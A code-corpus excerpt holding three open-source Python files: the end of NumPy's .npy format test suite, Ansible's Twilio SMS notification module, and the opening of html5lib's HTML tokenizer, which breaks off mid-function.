"F\x00{'descr': '>i4', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '>i4', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '>i4', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '>i4', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '<u8', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '<u8', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '<u8', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '<u8', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '<u8', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '<u8', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '>u8', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '>u8', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '>u8', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '>u8', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '>u8', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '>u8', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '<i8', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '<i8', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '<i8', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '<i8', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '<i8', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '<i8', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '>i8', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '>i8', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '>i8', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '>i8', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '>i8', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '>i8', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '<f4', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '<f4', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '<f4', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '<f4', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '<f4', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '<f4', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '>f4', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '>f4', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '>f4', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '>f4', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '>f4', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '>f4', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '<f8', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '<f8', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '<f8', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '<f8', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '<f8', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '<f8', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '>f8', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '>f8', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '>f8', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '>f8', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '>f8', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '>f8', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '<c8', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '<c8', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '<c8', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '<c8', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '<c8', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '<c8', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '>c8', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '>c8', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '>c8', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '>c8', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '>c8', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '>c8', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '<c16', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '<c16', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '<c16', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '<c16', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '<c16', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '<c16', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': '>c16', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': '>c16', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': '>c16', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': '>c16', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': '>c16', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': '>c16', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': 'O', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': 'O', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': 'O', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': 'O', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': 'O', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': 'O', 'fortran_order': False, 'shape': (3, 3)} \n" "F\x00{'descr': 'O', 'fortran_order': False, 'shape': (0,)} \n" "F\x00{'descr': 'O', 'fortran_order': False, 'shape': ()} \n" "F\x00{'descr': 'O', 'fortran_order': False, 'shape': (15,)} \n" "F\x00{'descr': 'O', 'fortran_order': False, 'shape': (3, 5)} \n" "F\x00{'descr': 'O', 'fortran_order': True, 'shape': (5, 3)} \n" "F\x00{'descr': 'O', 'fortran_order': False, 'shape': (3, 3)} \n" "v\x00{'descr': [('x', '<i4', (2,)), ('y', '<f8', (2, 2)), ('z', '|u1')],\n 'fortran_order': False,\n 'shape': (2,)} \n" "\x16\x02{'descr': [('x', '<i4', (2,)),\n ('Info',\n [('value', '<c16'),\n ('y2', '<f8'),\n ('Info2',\n [('name', '|S2'),\n ('value', '<c16', (2,)),\n ('y3', '<f8', (2,)),\n ('z3', '<u4', (2,))]),\n ('name', '|S2'),\n ('z2', '|b1')]),\n ('color', '|S2'),\n ('info', [('Name', '<U8'), ('Value', '<c16')]),\n ('y', '<f8', (2, 2)),\n ('z', '|u1')],\n 'fortran_order': False,\n 'shape': (2,)} \n" "v\x00{'descr': [('x', '>i4', (2,)), ('y', '>f8', (2, 2)), ('z', '|u1')],\n 'fortran_order': False,\n 'shape': (2,)} \n" "\x16\x02{'descr': [('x', '>i4', (2,)),\n ('Info',\n [('value', '>c16'),\n ('y2', '>f8'),\n ('Info2',\n [('name', '|S2'),\n ('value', '>c16', (2,)),\n ('y3', '>f8', (2,)),\n ('z3', '>u4', (2,))]),\n ('name', '|S2'),\n ('z2', '|b1')]),\n ('color', '|S2'),\n ('info', [('Name', '>U8'), ('Value', '>c16')]),\n ('y', '>f8', (2, 2)),\n ('z', '|u1')],\n 'fortran_order': False,\n 'shape': (2,)} \n" ''' import sys import os import shutil import tempfile import warnings from io import BytesIO import numpy as np from numpy.compat import asbytes, asbytes_nested, sixu from numpy.testing import ( run_module_suite, assert_, assert_array_equal, assert_raises, raises, dec, SkipTest ) from numpy.lib import format tempdir = None # Module-level setup. def setup_module(): global tempdir tempdir = tempfile.mkdtemp() def teardown_module(): global tempdir if tempdir is not None and os.path.isdir(tempdir): shutil.rmtree(tempdir) tempdir = None # Generate some basic arrays to test with. scalars = [ np.uint8, np.int8, np.uint16, np.int16, np.uint32, np.int32, np.uint64, np.int64, np.float32, np.float64, np.complex64, np.complex128, object, ] basic_arrays = [] for scalar in scalars: for endian in '<>': dtype = np.dtype(scalar).newbyteorder(endian) basic = np.arange(1500).astype(dtype) basic_arrays.extend([ # Empty np.array([], dtype=dtype), # Rank-0 np.array(10, dtype=dtype), # 1-D basic, # 2-D C-contiguous basic.reshape((30, 50)), # 2-D F-contiguous basic.reshape((30, 50)).T, # 2-D non-contiguous basic.reshape((30, 50))[::-1, ::2], ]) # More complicated record arrays. # This is the structure of the table used for plain objects: # # +-+-+-+ # |x|y|z| # +-+-+-+ # Structure of a plain array description: Pdescr = [ ('x', 'i4', (2,)), ('y', 'f8', (2, 2)), ('z', 'u1')] # A plain list of tuples with values for testing: PbufferT = [ # x y z ([3, 2], [[6., 4.], [6., 4.]], 8), ([4, 3], [[7., 5.], [7., 5.]], 9), ] # This is the structure of the table used for nested objects (DON'T PANIC!): # # +-+---------------------------------+-----+----------+-+-+ # |x|Info |color|info |y|z| # | +-----+--+----------------+----+--+ +----+-----+ | | # | |value|y2|Info2 |name|z2| |Name|Value| | | # | | | +----+-----+--+--+ | | | | | | | # | | | |name|value|y3|z3| | | | | | | | # +-+-----+--+----+-----+--+--+----+--+-----+----+-----+-+-+ # # The corresponding nested array description: Ndescr = [ ('x', 'i4', (2,)), ('Info', [ ('value', 'c16'), ('y2', 'f8'), ('Info2', [ ('name', 'S2'), ('value', 'c16', (2,)), ('y3', 'f8', (2,)), ('z3', 'u4', (2,))]), ('name', 'S2'), ('z2', 'b1')]), ('color', 'S2'), ('info', [ ('Name', 'U8'), ('Value', 'c16')]), ('y', 'f8', (2, 2)), ('z', 'u1')] NbufferT = [ # x Info color info y z # value y2 Info2 name z2 Name Value # name value y3 z3 ([3, 2], (6j, 6., ('nn', [6j, 4j], [6., 4.], [1, 2]), 'NN', True), 'cc', ('NN', 6j), [[6., 4.], [6., 4.]], 8), ([4, 3], (7j, 7., ('oo', [7j, 5j], [7., 5.], [2, 1]), 'OO', False), 'dd', ('OO', 7j), [[7., 5.], [7., 5.]], 9), ] record_arrays = [ np.array(PbufferT, dtype=np.dtype(Pdescr).newbyteorder('<')), np.array(NbufferT, dtype=np.dtype(Ndescr).newbyteorder('<')), np.array(PbufferT, dtype=np.dtype(Pdescr).newbyteorder('>')), np.array(NbufferT, dtype=np.dtype(Ndescr).newbyteorder('>')), ] #BytesIO that reads a random number of bytes at a time class BytesIOSRandomSize(BytesIO): def read(self, size=None): import random size = random.randint(1, size) return super(BytesIOSRandomSize, self).read(size) def roundtrip(arr): f = BytesIO() format.write_array(f, arr) f2 = BytesIO(f.getvalue()) arr2 = format.read_array(f2) return arr2 def roundtrip_randsize(arr): f = BytesIO() format.write_array(f, arr) f2 = BytesIOSRandomSize(f.getvalue()) arr2 = format.read_array(f2) return arr2 def roundtrip_truncated(arr): f = BytesIO() format.write_array(f, arr) #BytesIO is one byte short f2 = BytesIO(f.getvalue()[0:-1]) arr2 = format.read_array(f2) return arr2 def assert_equal_(o1, o2): assert_(o1 == o2) def test_roundtrip(): for arr in basic_arrays + record_arrays: arr2 = roundtrip(arr) yield assert_array_equal, arr, arr2 def test_roundtrip_randsize(): for arr in basic_arrays + record_arrays: if arr.dtype != object: arr2 = roundtrip_randsize(arr) yield assert_array_equal, arr, arr2 def test_roundtrip_truncated(): for arr in basic_arrays: if arr.dtype != object: yield assert_raises, ValueError, roundtrip_truncated, arr def test_long_str(): # check items larger than internal buffer size, gh-4027 long_str_arr = np.ones(1, dtype=np.dtype((str, format.BUFFER_SIZE + 1))) long_str_arr2 = roundtrip(long_str_arr) assert_array_equal(long_str_arr, long_str_arr2) @dec.slow def test_memmap_roundtrip(): # Fixme: test crashes nose on windows. if not (sys.platform == 'win32' or sys.platform == 'cygwin'): for arr in basic_arrays + record_arrays: if arr.dtype.hasobject: # Skip these since they can't be mmap'ed. continue # Write it out normally and through mmap. nfn = os.path.join(tempdir, 'normal.npy') mfn = os.path.join(tempdir, 'memmap.npy') fp = open(nfn, 'wb') try: format.write_array(fp, arr) finally: fp.close() fortran_order = ( arr.flags.f_contiguous and not arr.flags.c_contiguous) ma = format.open_memmap(mfn, mode='w+', dtype=arr.dtype, shape=arr.shape, fortran_order=fortran_order) ma[...] = arr del ma # Check that both of these files' contents are the same. fp = open(nfn, 'rb') normal_bytes = fp.read() fp.close() fp = open(mfn, 'rb') memmap_bytes = fp.read() fp.close() yield assert_equal_, normal_bytes, memmap_bytes # Check that reading the file using memmap works. ma = format.open_memmap(nfn, mode='r') del ma def test_compressed_roundtrip(): arr = np.random.rand(200, 200) npz_file = os.path.join(tempdir, 'compressed.npz') np.savez_compressed(npz_file, arr=arr) arr1 = np.load(npz_file)['arr'] assert_array_equal(arr, arr1) def test_python2_python3_interoperability(): if sys.version_info[0] >= 3: fname = 'win64python2.npy' else: fname = 'python3.npy' path = os.path.join(os.path.dirname(__file__), 'data', fname) data = np.load(path) assert_array_equal(data, np.ones(2)) def test_pickle_python2_python3(): # Test that loading object arrays saved on Python 2 works both on # Python 2 and Python 3 and vice versa data_dir = os.path.join(os.path.dirname(__file__), 'data') if sys.version_info[0] >= 3: xrange = range else: import __builtin__ xrange = __builtin__.xrange expected = np.array([None, xrange, sixu('\u512a\u826f'), asbytes('\xe4\xb8\x8d\xe8\x89\xaf')], dtype=object) for fname in ['py2-objarr.npy', 'py2-objarr.npz', 'py3-objarr.npy', 'py3-objarr.npz']: path = os.path.join(data_dir, fname) if (fname.endswith('.npz') and sys.version_info[0] == 2 and sys.version_info[1] < 7): # Reading object arrays directly from zipfile appears to fail # on Py2.6, see cfae0143b4 continue for encoding in ['bytes', 'latin1']: if (sys.version_info[0] >= 3 and sys.version_info[1] < 4 and encoding == 'bytes'): # The bytes encoding is available starting from Python 3.4 continue data_f = np.load(path, encoding=encoding) if fname.endswith('.npz'): data = data_f['x'] data_f.close() else: data = data_f if sys.version_info[0] >= 3: if encoding == 'latin1' and fname.startswith('py2'): assert_(isinstance(data[3], str)) assert_array_equal(data[:-1], expected[:-1]) # mojibake occurs assert_array_equal(data[-1].encode(encoding), expected[-1]) else: assert_(isinstance(data[3], bytes)) assert_array_equal(data, expected) else: assert_array_equal(data, expected) if sys.version_info[0] >= 3: if fname.startswith('py2'): if fname.endswith('.npz'): data = np.load(path) assert_raises(UnicodeError, data.__getitem__, 'x') data.close() data = np.load(path, fix_imports=False, encoding='latin1') assert_raises(ImportError, data.__getitem__, 'x') data.close() else: assert_raises(UnicodeError, np.load, path) assert_raises(ImportError, np.load, path, encoding='latin1', fix_imports=False) def test_pickle_disallow(): data_dir = os.path.join(os.path.dirname(__file__), 'data') path = os.path.join(data_dir, 'py2-objarr.npy') assert_raises(ValueError, np.load, path, allow_pickle=False, encoding='latin1') path = os.path.join(data_dir, 'py2-objarr.npz') f = np.load(path, allow_pickle=False, encoding='latin1') assert_raises(ValueError, f.__getitem__, 'x') path = os.path.join(tempdir, 'pickle-disabled.npy') assert_raises(ValueError, np.save, path, np.array([None], dtype=object), allow_pickle=False) def test_version_2_0(): f = BytesIO() # requires more than 2 byte for header dt = [(("%d" % i) * 100, float) for i in range(500)] d = np.ones(1000, dtype=dt) format.write_array(f, d, version=(2, 0)) with warnings.catch_warnings(record=True) as w: warnings.filterwarnings('always', '', UserWarning) format.write_array(f, d) assert_(w[0].category is UserWarning) f.seek(0) n = format.read_array(f) assert_array_equal(d, n) # 1.0 requested but data cannot be saved this way assert_raises(ValueError, format.write_array, f, d, (1, 0)) def test_version_2_0_memmap(): # requires more than 2 byte for header dt = [(("%d" % i) * 100, float) for i in range(500)] d = np.ones(1000, dtype=dt) tf = tempfile.mktemp('', 'mmap', dir=tempdir) # 1.0 requested but data cannot be saved this way assert_raises(ValueError, format.open_memmap, tf, mode='w+', dtype=d.dtype, shape=d.shape, version=(1, 0)) ma = format.open_memmap(tf, mode='w+', dtype=d.dtype, shape=d.shape, version=(2, 0)) ma[...] = d del ma with warnings.catch_warnings(record=True) as w: warnings.filterwarnings('always', '', UserWarning) ma = format.open_memmap(tf, mode='w+', dtype=d.dtype, shape=d.shape, version=None) assert_(w[0].category is UserWarning) ma[...] = d del ma ma = format.open_memmap(tf, mode='r') assert_array_equal(ma, d) def test_write_version(): f = BytesIO() arr = np.arange(1) # These should pass. format.write_array(f, arr, version=(1, 0)) format.write_array(f, arr) format.write_array(f, arr, version=None) format.write_array(f, arr) format.write_array(f, arr, version=(2, 0)) format.write_array(f, arr) # These should all fail. bad_versions = [ (1, 1), (0, 0), (0, 1), (2, 2), (255, 255), ] for version in bad_versions: try: format.write_array(f, arr, version=version) except ValueError: pass else: raise AssertionError("we should have raised a ValueError for the bad version %r" % (version,)) bad_version_magic = asbytes_nested([ '\x93NUMPY\x01\x01', '\x93NUMPY\x00\x00', '\x93NUMPY\x00\x01', '\x93NUMPY\x02\x00', '\x93NUMPY\x02\x02', '\x93NUMPY\xff\xff', ]) malformed_magic = asbytes_nested([ '\x92NUMPY\x01\x00', '\x00NUMPY\x01\x00', '\x93numpy\x01\x00', '\x93MATLB\x01\x00', '\x93NUMPY\x01', '\x93NUMPY', '', ]) def test_read_magic(): s1 = BytesIO() s2 = BytesIO() arr = np.ones((3, 6), dtype=float) format.write_array(s1, arr, version=(1, 0)) format.write_array(s2, arr, version=(2, 0)) s1.seek(0) s2.seek(0) version1 = format.read_magic(s1) version2 = format.read_magic(s2) assert_(version1 == (1, 0)) assert_(version2 == (2, 0)) assert_(s1.tell() == format.MAGIC_LEN) assert_(s2.tell() == format.MAGIC_LEN) def test_read_magic_bad_magic(): for magic in malformed_magic: f = BytesIO(magic) yield raises(ValueError)(format.read_magic), f def test_read_version_1_0_bad_magic(): for magic in bad_version_magic + malformed_magic: f = BytesIO(magic) yield raises(ValueError)(format.read_array), f def test_bad_magic_args(): assert_raises(ValueError, format.magic, -1, 1) assert_raises(ValueError, format.magic, 256, 1) assert_raises(ValueError, format.magic, 1, -1) assert_raises(ValueError, format.magic, 1, 256) def test_large_header(): s = BytesIO() d = {'a': 1, 'b': 2} format.write_array_header_1_0(s, d) s = BytesIO() d = {'a': 1, 'b': 2, 'c': 'x'*256*256} assert_raises(ValueError, format.write_array_header_1_0, s, d) def test_read_array_header_1_0(): s = BytesIO() arr = np.ones((3, 6), dtype=float) format.write_array(s, arr, version=(1, 0)) s.seek(format.MAGIC_LEN) shape, fortran, dtype = format.read_array_header_1_0(s) assert_((shape, fortran, dtype) == ((3, 6), False, float)) def test_read_array_header_2_0(): s = BytesIO() arr = np.ones((3, 6), dtype=float) format.write_array(s, arr, version=(2, 0)) s.seek(format.MAGIC_LEN) shape, fortran, dtype = format.read_array_header_2_0(s) assert_((shape, fortran, dtype) == ((3, 6), False, float)) def test_bad_header(): # header of length less than 2 should fail s = BytesIO() assert_raises(ValueError, format.read_array_header_1_0, s) s = BytesIO(asbytes('1')) assert_raises(ValueError, format.read_array_header_1_0, s) # header shorter than indicated size should fail s = BytesIO(asbytes('\x01\x00')) assert_raises(ValueError, format.read_array_header_1_0, s) # headers without the exact keys required should fail d = {"shape": (1, 2), "descr": "x"} s = BytesIO() format.write_array_header_1_0(s, d) assert_raises(ValueError, format.read_array_header_1_0, s) d = {"shape": (1, 2), "fortran_order": False, "descr": "x", "extrakey": -1} s = BytesIO() format.write_array_header_1_0(s, d) assert_raises(ValueError, format.read_array_header_1_0, s) def test_large_file_support(): if (sys.platform == 'win32' or sys.platform == 'cygwin'): raise SkipTest("Unknown if Windows has sparse filesystems") # try creating a large sparse file tf_name = os.path.join(tempdir, 'sparse_file') try: # seek past end would work too, but linux truncate somewhat # increases the chances that we have a sparse filesystem and can # avoid actually writing 5GB import subprocess as sp sp.check_call(["truncate", "-s", "5368709120", tf_name]) except: raise SkipTest("Could not create 5GB large file") # write a small array to the end with open(tf_name, "wb") as f: f.seek(5368709120) d = np.arange(5) np.save(f, d) # read it back with open(tf_name, "rb") as f: f.seek(5368709120) r = np.load(f) assert_array_equal(r, d) if __name__ == "__main__": run_module_suite()
gpl-3.0
jcpowermac/ansible
lib/ansible/modules/notification/twilio.py
47
5594
#!/usr/bin/python # -*- coding: utf-8 -*- # (c) 2015, Matt Makai <[email protected]> # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- version_added: "1.6" module: twilio short_description: Sends a text message to a mobile phone through Twilio. description: - Sends a text message to a phone number through the Twilio messaging API. notes: - This module is non-idempotent because it sends an email through the external API. It is idempotent only in the case that the module fails. - Like the other notification modules, this one requires an external dependency to work. In this case, you'll need a Twilio account with a purchased or verified phone number to send the text message. options: account_sid: description: user's Twilio account token found on the account page required: true auth_token: description: user's Twilio authentication token required: true msg: description: the body of the text message required: true to_number: description: one or more phone numbers to send the text message to, format +15551112222 required: true from_number: description: the Twilio number to send the text message from, format +15551112222 required: true media_url: description: a URL with a picture, video or sound clip to send with an MMS (multimedia message) instead of a plain SMS required: false author: "Matt Makai (@makaimc)" ''' EXAMPLES = ''' # send an SMS about the build status to (555) 303 5681 # note: replace account_sid and auth_token values with your credentials # and you have to have the 'from_number' on your Twilio account - twilio: msg: All servers with webserver role are now configured. account_sid: ACXXXXXXXXXXXXXXXXX auth_token: ACXXXXXXXXXXXXXXXXX from_number: +15552014545 to_number: +15553035681 delegate_to: localhost # send an SMS to multiple phone numbers about the deployment # note: replace account_sid and auth_token values with your credentials # and you have to have the 'from_number' on your Twilio account - twilio: msg: This server configuration is now complete. account_sid: ACXXXXXXXXXXXXXXXXX auth_token: ACXXXXXXXXXXXXXXXXX from_number: +15553258899 to_number: - +15551113232 - +12025551235 - +19735559010 delegate_to: localhost # send an MMS to a single recipient with an update on the deployment # and an image of the results # note: replace account_sid and auth_token values with your credentials # and you have to have the 'from_number' on your Twilio account - twilio: msg: Deployment complete! account_sid: ACXXXXXXXXXXXXXXXXX auth_token: ACXXXXXXXXXXXXXXXXX from_number: +15552014545 to_number: +15553035681 media_url: https://demo.twilio.com/logo.png delegate_to: localhost ''' # ======================================= # twilio module support methods # import json from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.six.moves.urllib.parse import urlencode from ansible.module_utils.urls import fetch_url def post_twilio_api(module, account_sid, auth_token, msg, from_number, to_number, media_url=None): URI = "https://api.twilio.com/2010-04-01/Accounts/%s/Messages.json" \ % (account_sid,) AGENT = "Ansible" data = {'From': from_number, 'To': to_number, 'Body': msg} if media_url: data['MediaUrl'] = media_url encoded_data = urlencode(data) headers = {'User-Agent': AGENT, 'Content-type': 'application/x-www-form-urlencoded', 'Accept': 'application/json', } # Hack module params to have the Basic auth params that fetch_url expects module.params['url_username'] = account_sid.replace('\n', '') module.params['url_password'] = auth_token.replace('\n', '') return fetch_url(module, URI, data=encoded_data, headers=headers) # ======================================= # Main # def main(): module = AnsibleModule( argument_spec=dict( account_sid=dict(required=True), auth_token=dict(required=True, no_log=True), msg=dict(required=True), from_number=dict(required=True), to_number=dict(required=True), media_url=dict(default=None, required=False), ), supports_check_mode=True ) account_sid = module.params['account_sid'] auth_token = module.params['auth_token'] msg = module.params['msg'] from_number = module.params['from_number'] to_number = module.params['to_number'] media_url = module.params['media_url'] if not isinstance(to_number, list): to_number = [to_number] for number in to_number: r, info = post_twilio_api(module, account_sid, auth_token, msg, from_number, number, media_url) if info['status'] not in [200, 201]: body_message = "unknown error" if 'body' in info: body = json.loads(info['body']) body_message = body['message'] module.fail_json(msg="unable to send message to %s: %s" % (number, body_message)) module.exit_json(msg=msg, changed=False) if __name__ == '__main__': main()
gpl-3.0
superchilli/webapp
venv/lib/python2.7/site-packages/html5lib/tokenizer.py
1710
76929
from __future__ import absolute_import, division, unicode_literals try: chr = unichr # flake8: noqa except NameError: pass from collections import deque from .constants import spaceCharacters from .constants import entities from .constants import asciiLetters, asciiUpper2Lower from .constants import digits, hexDigits, EOF from .constants import tokenTypes, tagTokenTypes from .constants import replacementCharacters from .inputstream import HTMLInputStream from .trie import Trie entitiesTrie = Trie(entities) class HTMLTokenizer(object): """ This class takes care of tokenizing HTML. * self.currentToken Holds the token that is currently being processed. * self.state Holds a reference to the method to be invoked... XXX * self.stream Points to HTMLInputStream object. """ def __init__(self, stream, encoding=None, parseMeta=True, useChardet=True, lowercaseElementName=True, lowercaseAttrName=True, parser=None): self.stream = HTMLInputStream(stream, encoding, parseMeta, useChardet) self.parser = parser # Perform case conversions? self.lowercaseElementName = lowercaseElementName self.lowercaseAttrName = lowercaseAttrName # Setup the initial tokenizer state self.escapeFlag = False self.lastFourChars = [] self.state = self.dataState self.escape = False # The current token being created self.currentToken = None super(HTMLTokenizer, self).__init__() def __iter__(self): """ This is where the magic happens. We do our usually processing through the states and when we have a token to return we yield the token which pauses processing until the next token is requested. """ self.tokenQueue = deque([]) # Start processing. When EOF is reached self.state will return False # instead of True and the loop will terminate. while self.state(): while self.stream.errors: yield {"type": tokenTypes["ParseError"], "data": self.stream.errors.pop(0)} while self.tokenQueue: yield self.tokenQueue.popleft() def consumeNumberEntity(self, isHex): """This function returns either U+FFFD or the character based on the decimal or hexadecimal representation. It also discards ";" if present. If not present self.tokenQueue.append({"type": tokenTypes["ParseError"]}) is invoked. """ allowed = digits radix = 10 if isHex: allowed = hexDigits radix = 16 charStack = [] # Consume all the characters that are in range while making sure we # don't hit an EOF. c = self.stream.char() while c in allowed and c is not EOF: charStack.append(c) c = self.stream.char() # Convert the set of characters consumed to an int. charAsInt = int("".join(charStack), radix) # Certain characters get replaced with others if charAsInt in replacementCharacters: char = replacementCharacters[charAsInt] self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "illegal-codepoint-for-numeric-entity", "datavars": {"charAsInt": charAsInt}}) elif ((0xD800 <= charAsInt <= 0xDFFF) or (charAsInt > 0x10FFFF)): char = "\uFFFD" self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "illegal-codepoint-for-numeric-entity", "datavars": {"charAsInt": charAsInt}}) else: # Should speed up this check somehow (e.g. move the set to a constant) if ((0x0001 <= charAsInt <= 0x0008) or (0x000E <= charAsInt <= 0x001F) or (0x007F <= charAsInt <= 0x009F) or (0xFDD0 <= charAsInt <= 0xFDEF) or charAsInt in frozenset([0x000B, 0xFFFE, 0xFFFF, 0x1FFFE, 0x1FFFF, 0x2FFFE, 0x2FFFF, 0x3FFFE, 0x3FFFF, 0x4FFFE, 0x4FFFF, 0x5FFFE, 0x5FFFF, 0x6FFFE, 0x6FFFF, 0x7FFFE, 0x7FFFF, 0x8FFFE, 0x8FFFF, 0x9FFFE, 0x9FFFF, 0xAFFFE, 0xAFFFF, 0xBFFFE, 0xBFFFF, 0xCFFFE, 0xCFFFF, 0xDFFFE, 0xDFFFF, 0xEFFFE, 0xEFFFF, 0xFFFFE, 0xFFFFF, 0x10FFFE, 0x10FFFF])): self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "illegal-codepoint-for-numeric-entity", "datavars": {"charAsInt": charAsInt}}) try: # Try/except needed as UCS-2 Python builds' unichar only works # within the BMP. char = chr(charAsInt) except ValueError: v = charAsInt - 0x10000 char = chr(0xD800 | (v >> 10)) + chr(0xDC00 | (v & 0x3FF)) # Discard the ; if present. Otherwise, put it back on the queue and # invoke parseError on parser. if c != ";": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "numeric-entity-without-semicolon"}) self.stream.unget(c) return char def consumeEntity(self, allowedChar=None, fromAttribute=False): # Initialise to the default output for when no entity is matched output = "&" charStack = [self.stream.char()] if (charStack[0] in spaceCharacters or charStack[0] in (EOF, "<", "&") or (allowedChar is not None and allowedChar == charStack[0])): self.stream.unget(charStack[0]) elif charStack[0] == "#": # Read the next character to see if it's hex or decimal hex = False charStack.append(self.stream.char()) if charStack[-1] in ("x", "X"): hex = True charStack.append(self.stream.char()) # charStack[-1] should be the first digit if (hex and charStack[-1] in hexDigits) \ or (not hex and charStack[-1] in digits): # At least one digit found, so consume the whole number self.stream.unget(charStack[-1]) output = self.consumeNumberEntity(hex) else: # No digits found self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-numeric-entity"}) self.stream.unget(charStack.pop()) output = "&" + "".join(charStack) else: # At this point in the process might have named entity. Entities # are stored in the global variable "entities". # # Consume characters and compare to these to a substring of the # entity names in the list until the substring no longer matches. while (charStack[-1] is not EOF): if not entitiesTrie.has_keys_with_prefix("".join(charStack)): break charStack.append(self.stream.char()) # At this point we have a string that starts with some characters # that may match an entity # Try to find the longest entity the string will match to take care # of &noti for instance. try: entityName = entitiesTrie.longest_prefix("".join(charStack[:-1])) entityLength = len(entityName) except KeyError: entityName = None if entityName is not None: if entityName[-1] != ";": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "named-entity-without-semicolon"}) if (entityName[-1] != ";" and fromAttribute and (charStack[entityLength] in asciiLetters or charStack[entityLength] in digits or charStack[entityLength] == "=")): self.stream.unget(charStack.pop()) output = "&" + "".join(charStack) else: output = entities[entityName] self.stream.unget(charStack.pop()) output += "".join(charStack[entityLength:]) else: 